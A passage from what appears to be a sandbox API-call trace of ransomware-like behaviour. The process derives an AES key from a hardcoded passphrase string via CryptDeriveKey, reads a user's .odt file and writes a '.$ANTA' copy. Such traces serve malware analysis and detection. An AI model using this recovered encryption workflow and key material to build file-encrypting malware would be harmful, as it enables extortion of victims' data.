lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.544] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0082.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.544] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0082.544] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.544] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.545] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c3740, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0082.545] CryptCreateHash (in: hProv=0x41a4948, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.545] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0082.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.545] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3668, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.545] CryptHashData (hHash=0x41ac500, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.545] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.546] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3620, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.546] CryptDeriveKey (in: hProv=0x41a4948, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac040) returned 1 [0082.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0082.546] CryptDestroyHash (hHash=0x41ac500) returned 1 [0082.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\bvjgydkdx.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0082.546] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.546] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0082.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0082.547] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43ed188 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.548] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\bVjgYdkDx.odt.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\bvjgydkdx.odt.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.549] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0082.549] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0082.549] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.549] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0082.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0082.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0082.553] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0082.553] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x5570, lpOverlapped=0x0) returned 1 [0082.553] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0082.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5570) returned 0x43fd3b8 [0082.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5570) returned 0x4402930 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0082.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.557] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5570) returned 0x43fd3b8 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.558] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.558] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0082.558] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 